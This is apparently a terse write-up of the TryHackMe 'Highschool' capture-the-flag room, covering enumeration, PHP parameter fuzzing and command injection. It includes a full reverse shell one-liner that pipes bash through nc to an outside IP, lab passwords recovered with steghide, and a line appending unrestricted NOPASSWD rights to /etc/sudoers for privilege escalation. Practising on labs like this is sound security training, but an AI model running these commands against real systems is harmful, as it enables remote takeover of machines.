THM Highschool
nmap
We first enumerate our ports and found only SSH & HTTP to be accessible.
Gobuster
Enumerated /assets/
Source code PHP
FUZZ php ID
Returns base64.
base64 -d [file] = dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK
uid=33(www-data) gid=33(www-data) groups=33(www-data)
HTML injection
http://10.10.83.52/assets/index.php?cmd=
This runs arbitrary bash CMD.
Used vuln to upload reverse shell
curl -s ‘http://10.10.83.52/assets/index.php’ -G –data-urlencode ‘cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.21.171.106 443 >/tmp/f’
/var/www/Hidden_content
We found passphrase.txt
QWxsbWlnaHRGb3JFdmVyISEhCg==
AllmightForEver!!!
Checked /home/users/
Found Deku user with user.txt can’t be readed.
Got lost but found /assets/images forbidden
There’s 2 jpgs in here with permission protection 1 corrupted.
hexeditor changed format to jpg
steghide to extract hidden data from jpg
Found password for deku:
One?For?All_!!one1/A
ssh into machine using deku/One?For?All_!!one1/A
cat user.txt
Faffed about eventually found /opt/NewComponent/feedback.sh
Feedback.sh lets you pass arbitrary bash commands
RM all password with
feedback.sh passes any arguments so, used sudo to pass this line that sets ALL to NOPASSWD and wrote it into sudoer file
deku ALL=NOPASSWD: ALL >> /etc/sudoers
NO MO’ PASSWD
cd to def and read root.txt